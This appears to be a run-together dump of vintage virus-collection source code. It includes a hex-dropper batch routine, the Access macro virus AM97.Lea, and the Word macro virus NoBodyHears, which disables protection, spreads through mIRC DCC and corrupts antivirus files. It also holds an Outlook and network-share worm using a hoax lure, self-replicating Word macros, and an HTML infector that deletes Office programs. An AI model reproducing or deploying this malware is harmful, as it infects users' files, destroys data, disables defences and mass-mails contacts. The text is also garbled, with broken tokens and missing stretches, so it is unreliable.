E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 0 3 FE"Print #3, "E 10E0 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 9 6 01"Print #3, "E 10F0 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 15 F 9 9F"Print #3, "E 1100 AF 96 6A FC CF D7 4B 25 FE E7 2B A6 0A FF F 3 35"Print #3, "E 1110 53 81 FF F9 AA A9 C0 FF 7C D5 54 E1 7F BE 6 6 2A"Print #3, "E 1120 F1 3F 5F 31 D5 F8 9F AF 97 8A FC CF 57 0B F C CF"Print #3, "E 1130 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 0 3 FE"Print #3, "E 1140 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 9 6 01"Print #3, "E 1150 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3 F CB"Print #3, "E 1160 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F 8 9F"Print #3, "E 1170 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 0 6 FC"Print #3, "E 1180 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2 C 03"Print #3, "E 1190 FE 67 19 F0 3F CB 80 FF 59 06 FB 9F F9 6F 8 0 03"Print #3, "E 11A0 5E 88 CA CD E8 5B 36 CA 9E F9 CF 5A BC B4 E 8 61"Print #3, "E 11B0 CC 0D D6 2C 19 3B F2 9E DE EE D0 78 D4 1F 0 C 47"Print #3, "E 11C0 B7 77 F7 0F E3 F1 64 3A 9B CD E7 8B E5 72 B 9 5A"Print #3, "E 11D0 AD 99 8D 41 5F 5E AD 68 7C 31 9F CF 66 D3 C 9 78"Print #3, "E 11E0 FC 70 7F 77 3B 1A 0E FA 51 8F 1D 6C 2C 81 3 D 1E"Print #3, "E 11F0 76 DB F5 8A 5D C5 0F 77 A3 44 AE 76 DC 6F D 7 4B"Print #3, "E 1200 E3 2F 36 B6 62 F6 AD 6D 56 8B 99 96 B2 59 A 5 F1"Print #3, "E 1210 91 87 A8 2A 76 57 06 DA EA A6 1F 71 B3 5E 2 D 17"Print #3, "E 1220 B3 29 3D 25 3F 23 3D E5 70 30 E8 F7 A3 A8 D 7 EB"Print #3, "E 1230 85 59 E8 7A 14 F5 FB 83 C1 90 36 46 6F CD 6 4 3A"
Print #3, "E 1240 9D 2D 96 AB F5 C6 6E 2D BF B5 E5 8F 77 6F E F B8"Print #3, "E 1250 C9 6D C9 A6 30 DE 5B F9 2F F6 BC 6A 92 3B A 7 D9"Print #3, "E 1260 9E 68 87 4C 7E 66 88 4F 0A F9 83 B9 D1 2D B 7 27"Print #3, "E 1270 2D D8 51 44 A9 D2 4B 75 8B F2 0B 29 C0 E1 C 8 04"Print #3, "E 1280 38 B1 01 2E 38 40 93 60 CC 8A E3 5B D8 F8 C C C6"Print #3, "E 1290 8C 28 A5 A8 C7 0E BB D6 F9 F9 91 15 80 9B F 5 92"Print #3, "E 12A0 FD CF F7 B7 23 B6 75 76 5A 71 58 39 FF B3 4 9 74"Print #3, "E 12B0 96 F3 3F EF B7 1C 29 BB 2B 39 D3 D0 3E E2 6 1 4F"Print #3, "E 12C0 F9 51 7C F3 99 89 EF CE C6 17 71 7C 3A B5 C 0 60"Print #3, "E 12D0 13 A4 71 1B E0 9D 09 70 46 73 61 45 F9 ED 0 F 76"Print #3, "E 12E0 6B 43 9D D5 3D 77 A9 B2 29 EC C8 A7 2B 3C D B 74"Print #3, "E 12F0 7E 66 B6 5D 46 AA 87 EC 9C D4 65 7C D7 03 E F E9"Print #3, "E 1300 3C 01 C3 74 02 9A DF 19 3D A9 0D 30 89 50 5 F E6"Print #3, "E 1310 F8 16 1C 1F 6F 4C 3A FD D8 FF 4C 41 D1 1C E 2 10"Print #3, "E 1320 74 30 76 AE 25 33 AB 30 D9 D2 19 D9 8F 67 2 4 0F"Print #3, "E 1330 65 92 67 77 AA 7D 44 9E 7E F3 CC 6F 2C 9E 7 D 69"Print #3, "E 1340 78 49 84 C9 0C 4C 67 C3 DC 4C 40 BD B5 FC D 6 36"Print #3, "E 1350 37 8B D8 75 6A F6 D6 7E 66 6F FD 1F 50 4B 0 1 02"Print #3, "E 1360 14 00 14 00 00 00 08 00 38 51 9B 28 17 D3 0 9 49"Print #3, "E 1370 36 12 00 00 36 F8 01 00 08 00 00 00 00 00 0 0 00"Print #3, "E 1380 00 00 20 00 B6 81 00 00 00 00 6C 6F 67 6F 2 E 53"Print #3, "E 1390 59 53 50 4B 05 06 00 00 00 00 01 00 01 00 3 6 00"Print #3, "E 13A0 00 00 5C 12 00 00 00 00"Print #3, "RCX"Print #3, "12A8"Print #3, "W"Print #3, "Q"Close #3End Sub
Sub CreateBat()Open "c:\windows\hop_along.bat" For Output As #4Print #4, "del c:\windows\logo.sys"Print #4, "del c:\logo.sys"Print #4, "cd c:\windows\"Print #4, "debug < c:\windows\pkunzip.dbg"Print #4, "debug < c:\windows\logo.dbg"Print #4, "c:\windows\pkunzip.com logo.zip"Print #4, "exit"Close #4End Sub
Sub Wait4Bat()If Dir( "c:\windows\logo.sys" ) = "" Then Wait4BatEnd Sub
Option Compare DatabaseOption ExplicitFunction Lea()'AM97.Lea.a'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]On Error Resume NextCommandBars( "tools" ).Controls( "Macro" ).DeleteCurrentDb.Properties( "AllowBypassKey" ) = FalseCurrentDb.Properties( "AllowSpecialKeys" ) = FalseCurrentDb.Properties( "AllowBreakIntoCode" ) = FalseApplication.DisplayStatusBar = FalseApplication.DisplayAlerts = FalseApplication.MacrovirusProtection = FalseDim FilesToGet, FilesToInfect, CodeBase As StringFilesToInfect = FalseFilesToGet = Dir( "*.mdb" , vbNormal)If FilesToGet <> "" ThenCodeBase = CurrentDb.NameIf CodeBase = FilesToGet Then FilesToInfect = TrueIf FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acMacro, "Autoexec" , "Autoexec"If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acModule, "lea" , "lea"While FilesToGet <> "FilesToGet = DirIf CodeBase = FilesToGet Then FilesToInfect = TrueIf FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acMacro, "Autoexec" , "Autoexec"If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acModule, "lea" , "lea"WendOn Error GoTo Exit_PayloadIf Day(Now()) = Int(Rnd() * 3) + 1 ThenMsgBox "AM97.Lea.a" , "Welcome to this place, I'll Show you everything. W ith arms wide open."End IfExit_Payload:End IfEnd Function
Attribute VB_Name = "NoBodyHears"Sub AutoClose()'************************************************** ****************'WM97 NoBodyHears'By AngelsKitten / [NuKE]'Greetings to Evul, Knowdeth, Jackie twoflower, Fox z'Reptile, Duke, Raven, Deloss, Bumblebee, Masey, RA iD,'FlyShadow, and the following groups: MVT, 29A, NVT & SLAM'************************************************** ****************On Error Resume NextApplication.VBE.ActiveVBProject.VBComponents( "NoBodyHears" ).Export "C:\VXD.dll"With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = FalseEnd WithWith Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabledEnd WithCommandBars( "Tools" ).Controls( "Macro" ).Enabled = FalseCommandBars( "Tools" ).Controls( 12).Enabled = FalseCommandBars( "Tools" ).Controls( 12).DeleteCommandBars( "tools" ).Controls( "Macro" ).DeleteCommandBars( "tools" ).Controls( "Customize..." ).DeleteCommandBars( "view" ).Controls( "Toolbars" ).DeleteCommandBars( "view" ).Controls( "Status Bar" ).DeleteFor ¢ = 1 To NormalTemplate.VBProject.VBComponents.CountIf NormalTemplate.VBProject.VBComponents(¢).Name = "NoBodyHears" Then ¶ = TrueNext ¢For ¢ = 1 To ActiveDocument.VBProject.VBComponents.CountIf ActiveDocument.VBProject.VBComponents(¢).Name = "NoBodyHears" Then Ü = TrueNext ¢If Ü = True And ¶ = False Then Set § = NormalTemplate.VBProject _Else If Ü = False And ¶ = True Then Set § = ActiveDocument.VBProject§.VBComponents.Import ( "C:\VXD.dll" )On Error GoTo scriptoopsOpen "C:\audio.vxd" For Output As #1Print #1, "[script]"Print #1, "n0=;NobodyHears by Angelskitten / [NuKE]"Print #1, "n1=on 1:PART:#:{ /if ( $nick == $me ) { halt }"Print #1, "n2= /dcc send $nick C:\windows\aboutme.doc"Print #1, "n3=}"Print #1, "n4="Print #1, "n5=on 1:JOIN:#:{ /if ( $nick == $me ) { halt }"Print #1, "n6= /dcc send $nick C:\windows\aboutme.doc"Print #1, "n7=}"Print #1, "n8="Print #1, "n9=on 1:TEXT:*infected*:#:/.ignore $nick"Print #1, "n10=on 1:TEXT:*infected*:?:/.ignore $nick"Print #1, "n12=on 1:TEXT:*clean*:#:/.ignore $nick"Print #1, "n13=on 1:TEXT:*clean*:?:/.ignore $nick"Print #1, "n14=on 1:TEXT:*script.ini*:#:/.ignore $nick"Print #1, "n15=on 1:TEXT:*script.ini*:?:/.ignore $nick"Print #1, "n16=on 1:TEXT:*virus*:#:/.ignore $nick"Print #1, "n17=on 1:TEXT:*virus*:?:/.ignore $nick"Print #1, "n18=on 1:TEXT:*worm*:#:/.ignore $nick"Print #1, "n19=on 1:TEXT:*worm*:?:/.ignore $nick"Print #1, "n20=on 1:TEXT:*aboutme*:#:/.ignore $nick"Print #1, "n21=on 1:TEXT:*aboutme*:?:/.ignore $nick"Print #1, "n22=on 1:TEXT:*aboutme.doc*:#:/.ignore $nick"
Print #1, "n23=on 1:TEXT:*aboutme.doc*:?:/.ignore $nick"Print #1, "n24=on 1:TEXT:*doc*:#:/.ignore $nick"Print #1, "n25=on 1:TEXT:*doc*:?:/.ignore $nick"Print #1, "n26=on 1:TEXT:*blank*:#:/.ignore $nick"Print #1, "n27=on 1:TEXT:*blank*:?:/.ignore $nick"Print #1, "n28=ON 1:QUIT:#:/msg $chan I tryed to tell you, I tryed to show you. NoBodyHears"Print #1, "n29=ON 1:connect: {"Print #1, "n30= /run attrib +r +s +h C:\mirc\Script.ini"Print #1, "n31=}"Close #1scriptoops:On Error GoTo batoopsOpen "c:\windows\WinStart.bat" For Output As #2Print #2, "@Echo Off"Print #2, "copy /y c:\audio.vxd c:\mirc\script.ini >nul"Print #2, "copy /y c:\PROGRA~1\MICROS~3\TEMPLA~1\normal.dot c :\windows\aboutme.doc >nul"Close #2batoops:If Day(Now()) = 12 ThenSetAttr "C:\program files\AntiViral Toolkit Pro\*.avc" , vbReadOnlyOpen "C:\program files\AntiViral Toolkit Pro\*.avc" For Output As #3Print #3, "NoBodyHears"Close #3SetAttr "C:\program files\AntiViral Toolkit Pro\avp.set" , vbReadOnlyOpen "C:\program files\AntiViral Toolkit Pro\avp.set" For Output As #4Print #4, "NoBodyHears"Close #4SetAttr "C:\program files\mcafee\*.dat" , vbReadOnlyOpen "C:\program files\mcafee\*.def" For Output As #5Print #5, "NoBodyHears"Close #5SetAttr "C:\f-marco\*.def" , vbReadOnlyOpen "C:\f-macro\*.def" For Output As #6Print #6, "NoBodyHears"Close #6End IfIf Day(Now()) = Int(Rnd * 31) + 1 Then
With Assistant.NewBalloon.Icon = msoIconTip.Animation = msoAnimationGetArtsy.Heading = "WM97 NoBodyHears".Text = "Welcome to WM97 NoBodyHears by Angelskitten / [NuK E]".Show
End WithActiveDocument.Password = "NoBodyHears"Shell "start http://www.avp.com.au/" , vbHide
End IfActiveDocument.SaveAs FileName:=ActiveDocument.FullN ame, FileFormat:=wdFormatDocumentSetAttr ( "c:\VXD.dll" ), vbHidden + vbSystemEnd SubSub AutoOpen()
Call AutoCloseEnd SubSub AutoNew()
Call AutoCloseEnd SubSub ViewVBCode()
MsgBox "Unexcpected error" , 16Call AutoClose
End SubSub ViewCode()
MsgBox "Unexcpected error" , 16Application.Caption = "Word 6.0"
Call AutoCloseEnd SubSub ToolsMacro()
MsgBox "Unexcpected error" , 16Call AutoClose
End SubSub FileTemplates()
MsgBox "Unexcpected error" , 16Application.Caption = "Word 6.0"Call AutoClose
End SubSub HelpWordPerfectHelp()MsgBox "Unexcpected error" , 16
Application.Caption = "Word 6.0"Call AutoClose
End Sub
' Worm Name: NETWORK/OUTLOOK.FakeHoax' Author: Zulu' Origin: Argentina
' Encoded JScript/VBScript worm, first in a JSE or VBE file. It uses OUTLOOK and the network' shares.' The main code is a COM object written in XML and VBScript using Windows Script Component, so' the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object' defined in XML) and then both call methods and ch ange properties of that object, no real' spreading code is in those files.' The worm was written in this way to make it easie r to port it to any other language, this way' I was able of creating a JSE and a VBE file witho ut really porting the main code. Also, it's' possible to create new versions using Delphi, Vis ual C++, or any other by using "REGSVR32.EXE"' to register the WSC file as a COM object before c alling it's methods or changing it's' properties.' This worm was written to show how JSE and VBE fil es could be used in viruses/worms, since' before this they where only used as auxiliary fil es (some versions of HTML.rahC by 1nternal and' OUTLOOK.Monopoly by me for example). Besides, sin ce it needs Windows Script Host 2.0 or later,' it won't be good spreading itself at the time of writing this.' Also, this was a good opportunity for using Windo ws Script Component for the first time because' it made possible to write a JScript and a VBScrip t version without needing to port the whole' code, so this is also the first virus/worm using it's own COM object.' ' Features:' ' - OUTLOOK spreading. It will use OUTLOOK to send itself to all contacts in the address book if' the number of addresses is less than 101. If th at number is more than 100 it will try to' select 100 random addresses. Subject and body a re always the same.' - Network spreading. It will copy itself to the r oot of all shares (not only mapped drives),' waiting for someone to run it.' - The worm file ("WOBBLER.TXT.JSE" or "WOBBLER.TX T.VBE" depending of the version) will show a' TXT file when run, so it will show what many us ers expect.' This TXT file will show the Wobbler hoax (the r eason of the worm's name), which is a strange' social engineering method for a real worm. Anyw ay, since this won't spread well because of' other reasons, even if someone wants to spread it, I won't know if the hoax message is good' for this purpose. Message subject and body talk about important information in the TXT file,' but they don't talk about the hoax because this could cause fear in the user from opening the' file or maybe make the user remember about viru ses and checking for double extensions.' - It has a 1/5 probability of also sending other email to the same addresses of the email' having the worm file. The body of this email wi ll have a poem written in spanish.' The reason of this is an unusual request from a friend, she wanted one of her poems to be' included in a virus/worm.' So, even if this means unnecessary bytes and ev en worse spreading capabilities, here it is. :)' - There is no need of AV products or removers aft er running the worm since Windows' settings are' not changed and all temporary files are deleted .' ' Here is the JSE file without encoding:
G=new ActiveXObject( "Scripting.FileSystemObject" );A=G.GetTempName().concat( ".WSC" );
S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder( 2),A), true );S.Write( "<?XML version=\" 1.0 \ "?>\r\n<component>\r\n <comment>\r\n NETWORK/OUTLOOK.FakeHoax\r\n </comment>\r\n <publ ic>\r\n <property name=\" AttachmentFile\ "/>\r\n <property name=\" TextFile\ "/>\r\n <property name=\" WormFile\ "/>\r\n <method name=\" DelTempFiles\ "/>\r\n <method name=\" NetworkSpreading\ ">\r\n <parameter name=\" FileName\ "/>\r\n </method>\r\n <method name=\" OutlookSpreading\">\r\n <parameter name=\" Body\ "/>\r\n <parameter name=\" MaxAmount\ "/>\r\n <parameter name=\" Subject\ "/>\r\n </method>\r\n <method name=\" ShowText\ ">\r\n <parameter name=\"C ontent\ "/>\r\n </method>\r\n </public>\r\n <script la nguage=\"VBScript\ ">\r\n <
File.Close\r\n Set File = Nothing\r\n Set FSO = Nothing\r\n Set WSHShell = CreateObject(\" WScript.Shell\ ")\r\n WSHShell.Run(TextFile)\r\n Set WSH Shell = Nothing\r\n End Sub\r\n ]]>\r\n </script>\r\ n</component>\r\n" )S.Close();F=GetObject( "script:" .concat(G.BuildPath(G.GetSpecialFolder( 2),A)));F.AttachmentFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT.JSE" );F.TextFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT");F.WormFile=WScript.ScriptFullName;F.ShowText( "Thought you might be interested in this message. I f you receive an\r\nemail with a file called \"C alifornia\ " do not open the file. The file\r\ncontains the \" WOBBLER\" virus.\r\n\r\nThis information was announced yester day morning by IBM. The statement\r\nsays that ... \" This is a very dangerous virus, much worse than\r\n 'Melissa' and there is NO remedy for it at this time. Some very sick\r\nindiv idual has succeeded in using the reformat function from Norton\r\nUtilities causing it to com pletely erase all documents on the hard\r\ndrive. It has been designed to work with Ne tscape Navigator and\r\nMicrosoft Internet Explorer. It destroys Macintosh and IBM co mpatible\r\ncomputers. This is a new, very malicious virus and not many people\r\nknow ab out it at this time.\"\r\n\"Please pass this warning file to everyone in your address book and\r\nshare it with all your online friends ASAP so that the destruction it\r\ncan caus e may be minimized.\"\r\n");F.OutlookSpreading( 100 , "Fw: important" , "> Thought you might be interested in this message, read the attachment for more information." );F.NetworkSpreading( "WOBBLER.TXT.JSE" );F.DelTempFiles();G.DeleteFile(G.BuildPath(G.GetSpecialFolder( 2),A), true );
' Here is the VBE file without encoding:
Set G=CreateObject( "Scripting.FileSystemObject" )A=G.GetTempName&".WSC"Set S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder( 2),A), True )O=Chr( 13)&Chr( 10)S.Write "<?XML version=""1.0""?>" &O&"<component>" &O&" <comment>" &O&" NETWORK/OUTLOOK.FakeHoax"&O&" </comment>" &O&" <public>" &O&" <property name=""AttachmentFile""/>" &O&" <property name=""TextFile""/>" &O&" <property name=""WormFile""/>" &O&" <method name=""DelTempFiles""/>" &O&" <method name=""NetworkSpreading"">" &O&" <parameter name=""FileName""/>" &O&" </method>" &O&" <method name=""OutlookSpreading"">" &O&" <parameter name=""Body""/>" &O&" <parameter name=""MaxAmount""/>" &O&" <parameter name=""Subject""/>" &O&" </method>" &O&" <method name=""ShowText"">" &O&" <parameter name=""Content""/>" &O&" </method>" &O&" </public>" &O&" <script language=""VBScript"">" &O&" <
Address(Counter2) = -1" &O&" Next" &O&" Next" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" If Address(Counter1) = -1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)" &O&" Next" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" For Counter2 = Counter1 + 1 To MaxAmount - 1" &O&" If Address(Counter1) = Address(C ounter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1 " &O&" Next" &O&" Next" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" If Address(Counter1) <> -1 Then" &O&" Set Entry = List.AddressEntries(Address(Counter1))" &O&" If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address" &O&" Set Entry = Nothing" &O&" End If" &O&" Next" &O&" Else" &O&" For Counter1 = 1 To List.AddressEntr ies.Count" &O&" Set Entry = List.AddressEntries(Counter1)" &O&" If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address" &O&" Set Entry = Nothing" &O&" Next" &O&" End If" &O&" Email1.BCC = Addresses" &O&" Email1.Subject = Subject" &O&" Email1.Body = Body" &O&" Email1.Attachments.Add AttachmentFile" &O&" Email1.DeleteAfterSubmit = True" &O&" Email1.Send" &O&" Set Email1 = Nothing" &O&" Randomize" &O&" If Int(5 * Rnd) = 0 Then" &O&" Set Email2 = Outlook.CreateItem(0)" &O&" Email2.BCC = Addresses" &O&" Email2.Subject = ""Alma""" &O&" Email2.Body = ""No alucines que te a mo,"" & Chr(13) & Chr(10) & ""cuando en realidad es solo"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n qui"" & Chr(233) & ""n lo hace."" & Chr(13) & Chr(10) & ""Porque como ya sabr"" & Chr(225) & ""s,"" & Chr(13) & Chr(10) & "" mi coraz"" & Chr(243) & ""n no manda en mi vida,"" & Chr(13) & Chr(10) & ""si as"" & Chr(23 7) & "" lo hiciera,"" & Chr(13) & Chr(10) & ""mi alma estar"" & Chr(237) & ""a perdida.""" &O&" Email2.DeleteAfterSubmit = True" &O&" Email2.Send" &O&" Set Email2 = Nothing" &O&" End If" &O&" End If" &O&" Next" &O&" Set MAPI = Nothing" &O&" Set Outlook = Nothing" &O&" End If" &O&" End Sub" &O&" Sub ShowText(Content)" &O&" On Error Resume Next" &O&" Set FSO = CreateObject(""Scripting.FileSyste mObject"")" &O&" Set File = FSO.CreateTextFile(TextFile, True )" &O&" File.Write(Content)" &O&" File.Close" &O&" Set File = Nothing" &O&" Set FSO = Nothing" &O&" Set WSHShell = CreateObject(""WScript.Shell"")" &O&" WSHShell.Run(TextFile)" &O&" Set WSHShell = Nothing" &O&" End Sub" &O&" ]]>" &O&" </script>" &O&"</component>" &OS.CloseSet F=GetObject( "script:" &G.BuildPath(G.GetSpecialFolder( 2),A))F.AttachmentFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT.VBE")F.TextFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT")F.WormFile=WScript.ScriptFullNameF.ShowText "Thought you might be interested in this message. I f you receive an" &O&"email with a file called ""California"" do not open the f ile. The file" &O&"contains the ""WOBBLER"" virus." &O&O&"This information was announced yesterday morning b y IBM. The statement" &O&"says that ... ""This is a very dangerous virus, mu ch worse than" &O&"'Melissa' and there is NO remedy for it at this time. Some ve ry sick" &O&"individual has succeeded in using the reformat function from Norton" &O&"Utilities causing it to completely erase all documents on the hard" &O&"drive. It has been designed to work with Netscape Navigator and" &O&"Microsoft Internet Explorer. It destroys Macintosh and IBM compatible" &O&"computers. This is a new, very malicious virus and not many people" &O&"know about it at this time.""" &O&"""Please pass this warning file to everyone in you r address book and" &O&"share it with all your online friends ASAP so that the destruction it " &O&"can cause may be minimized.""" &OF.OutlookSpreading 100 , "Fw: important" , "> Thought you might be interested in this message, read the attachment for more information."F.NetworkSpreading "WOBBLER.TXT.VBE"F.DelTempFilesG.DeleteFile G.BuildPath(G.GetSpecialFolder( 2),A), True
' Here is the WSC file (the COM object), I used spa ces and "normal" variable names to make it' easier to read:
<?XML version= "1.0" ?><component>
<comment>NETWORK/OUTLOOK.FakeHoax
</comment><public >
<property name="AttachmentFile" /><property name="TextFile" /><property name="WormFile" /><method name= "DelTempFiles" /><method name= "NetworkSpreading" >
<parameter name= "FileName" /></method><method name= "OutlookSpreading" >
<parameter name= "Body" /><parameter name= "MaxAmount" /><parameter name= "Subject" />
</method><method name= "ShowText" >
<parameter name= "Content" /></method>
</ public ><script language= "VBScript" >
<
Address(Counter2) = - 1Next
NextFor Counter1 = 0 To MaxAmount - 1
If Address(Counter1) = - 1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)
NextFor Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1If Address(Counter1) = Address(Counter2) And Address(Counter1) <> - 1 Then
Address(Counter2) = - 1Next
NextFor Counter1 = 0 To MaxAmount - 1
If Address(Counter1) <> - 1 ThenSet Entry = List.AddressEntries(Address(Counter1))If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.AddressSet Entry = Nothing
End IfNext
ElseFor Counter1 = 1 To List.AddressEntries.Count
Set Entry = List.AddressEntries(Counter1)If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses &
"; " & Entry.AddressSet Entry = Nothing
NextEnd IfEmail1.BCC = AddressesEmail1.Subject = SubjectEmail1.Body = BodyEmail1.Attachments.Add AttachmentFileEmail1.DeleteAfterSubmit = TrueEmail1.SendSet Email1 = NothingRandomizeIf Int( 5 * Rnd) = 0 Then
Set Email2 = Outlook.CreateItem( 0)Email2.BCC = AddressesEmail2.Subject = "Alma"Email2.Body = "No alucines que te amo," & Chr( 13) & Chr( 10) & "cuando en
realidad es solo" & Chr( 13) & Chr( 10) & "mi coraz" & Chr( 243 ) & "n qui" & Chr( 233 ) & "n lo hace." & Chr( 13) & Chr( 10) & "Porque como ya sabr" & Chr( 225 ) & "s," & Chr( 13) & Chr( 10) &"mi coraz" & Chr( 243 ) & "n no manda en mi vida," & Chr( 13) & Chr( 10) & "si as" & Chr( 237 ) &" lo hiciera," & Chr( 13) & Chr( 10) & "mi alma estar" & Chr( 237 ) & "a perdida."
Email2.DeleteAfterSubmit = TrueEmail2.SendSet Email2 = Nothing
End IfEnd If
NextSet MAPI = NothingSet Outlook = Nothing
End IfEnd SubSub ShowText(Content)
On Error Resume NextSet FSO = CreateObject( "Scripting.FileSystemObject" )Set File = FSO.CreateTextFile(TextFile, True )File.Write(Content)File.CloseSet File = Nothing
Set FSO = NothingSet WSHShell = CreateObject( "WScript.Shell" )WSHShell.Run(TextFile)Set WSHShell = Nothing
End Sub]]>
</script></component>
VERSION 1.0 CLASSBEGIN
MultiUse = - 1 'TrueENDAttribute VB_Name = "ThisDocument"Attribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TruePrivate Function IT()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabledSet A = VBE.SelectedVBComponent.CodeModuleB = A.Lines(A.ProcStartLine( "IT" , vbext_pk_Proc), A.ProcCountLines( "IT" , vbext_pk_Proc))For c = 1 To VBE.VBProjects.CountFor D = 1 To VBE.VBProjects(c).VBComponents.CountSet E = VBE.VBProjects(c).VBComponents(D).CodeModuleIf E.ProcOfLine(E.ProcStartLine( "IT" , vbext_pk_Proc), 1) <> "IT" And E.CountOfLines > 2 ThenE.AddFromString BFor F = 1 To E.CountOfLinesG = E.ProcOfLine(F, 1)If H <> G And G <> "IT" And Right(E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1), 4) <> ": IT"
ThenE.ReplaceLine E.ProcStartLine(G, vbext_pk_Proc), E.Lin es(E.ProcStartLine(G, vbext_pk_Proc), 1) & ": IT"H = GEnd IfNextNextNextEnd FunctionPrivate Sub Document_Open(): IT'My_Creator = Lys Kovick'My_Name = Neclovek'My_Comments = Do Not Distribute!End Sub
VERSION 1.0 CLASSBEGIN
MultiUse = - 1 'TrueENDAttribute VB_Name = "ThisDocument"Attribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TruePrivate Function IT()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabledSet A = VBE.SelectedVBComponent.CodeModuleB = A.Lines(A.ProcStartLine( "IT" , vbext_pk_Proc), A.ProcCountLines( "IT" , vbext_pk_Proc))For c = 1 To VBE.VBProjects.CountFor D = 1 To VBE.VBProjects(c).VBComponents.CountSet E = VBE.VBProjects(c).VBComponents(D).CodeModuleF = ""F = E.Lines(E.ProcStartLine( "IT" , vbext_pk_Proc), E.ProcCountLines( "IT" , vbext_pk_Proc))If E.CountOfLines > 2 And F <> B Then E.AddFromString BFor G = 1 To E.CountOfLinesH = E.ProcOfLine(G, 1)If I <> H And H <> "IT" And Right(E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1), 4) <> ": IT"
ThenE.ReplaceLine E.ProcStartLine(H, vbext_pk_Proc), E.Lin es(E.ProcStartLine(H, vbext_pk_Proc), 1) & ": IT"I = HEnd IfNextNextNextEnd FunctionPrivate Sub Document_Open(): IT'My_Creator = Lys Kovick'My_Name = Unperson'My_Comments = Do Not Distribute!End Sub
<SCRIPT LANGUAGE="VBScript" ><!--
Dim FSO,MSBound,DC,D,TMP,FMSBound = "<SCRIPT LANGUAGE=#VBScript#>$<!--$ Dim FSO,MSBoun d,DC,D,TMP,F$ MSBound =
#|#$ On Error Resume Next$ TMP = ReplaceWithIn(Ch r(36),vbCrLf,MSBound)$ TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)$ F = InStr(1,TM P,Chr(124))$ MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)$ F = InStr(2500,MSBound,Chr (124))$ MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)$$ Set FSO = CreateObject(#Scripti ng.FileSystemObject#)$ If Err.Number = 0 Then$ Set DC = FSO.Drives$ For Each D I n DC$ If D.DriveType = 2 Then$ SweepDrive D.DriveLetter & #:\#$ End If$ Next$ End If$$Sub SweepDrive(pPath)$ Dim F, S, O$ On Error Resume N ext$ Set F = FSO.GetFolder(pPath)$ InfectFiles F$ Set S = F.SubFolders$ For Each O I n S$ SweepDrive(pPath & O.Name & #\#)$ Next $End Sub $$Sub InfectFiles(pFold er)$ Dim F,Member,Ext,M,C$ On Error Resume Next$ Set F = pFolder.Files$ For Each Memb er In F$ M = UCase(Member.Name)$ If M = #WINWORD.EXE# Or M = #ACCESS.EXE# Or M = #EXCEL.EXE# Or M = #WORD.EXE# Then$ Set M = FSO.GetFile(Member .Path)$ M.Attributes = (M.Attributes And 1) - 1$ M.Delete$ En d If $ Ext = UCase(FSO.GetExtensionName(Member.Name))$ If E xt = #HTML# Or Ext = #HTM# Then$ Set M = FSO.OpenTextFile(Member.Path,1)$ C = M.ReadAll$ If InStr(1,C,MSBound) = 0 Then$ Set M = FSO .CreateTextFile(Member.Path, True)$ M.WriteLine MSBound & C$ M.Close$ End If$ End if$ Next$End Sub$$Private Function ReplaceWithIn(CurCha r,NewChar,SourceString)$ Dim T,TMP$ T = 1$ TMP = SourceString$ Do While T > 0$ T = In Str(T, TMP, CurChar)$ If T > 0 Then TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)$ Loop $ ReplaceWithIn = TMP$End Function$$'MSBound by Suppa.$-->$<|/SCRIPT>$$"
On Error Resume NextTMP = ReplaceWithIn(Chr( 36),vbCrLf,MSBound)TMP = ReplaceWithIn(Chr( 35),Chr( 34),TMP)F = InStr( 1,TMP,Chr( 124 ))MSBound = Left(TMP,F- 1) & MSBound & Mid (TMP,F+ 1)F = InStr( 2500 ,MSBound,Chr( 124 ))MSBound = Left(MSBound,F- 1) & Mid (MSBound,F+ 1)
